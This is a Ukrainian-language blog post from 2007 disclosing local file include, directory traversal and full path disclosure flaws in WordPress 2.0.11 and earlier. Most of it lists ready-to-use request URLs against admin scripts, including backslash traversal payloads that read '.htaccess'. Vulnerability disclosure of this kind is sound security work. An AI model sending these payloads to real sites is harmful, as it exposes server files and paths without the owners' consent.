Local file include, Directory traversal та Full path disclosure в WordPress

23:43 30.12.2007

Продовжу оприлюднювати численні уразливості в WP в День багів в WordPress. Про деякі подібні уразливості я писав раніше.

В грудні, 22.12.2007, я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметрі page), а також в файлах admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Local file include та Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).


2 відповідей на “Local file include, Directory traversal та Full path disclosure в WordPress”

  1. Mefesto каже:

    Its was intresting, thnx.

  2. MustLive каже:

    Mefesto

    You are welcome.

Leave a Reply

You must be logged in to post a comment.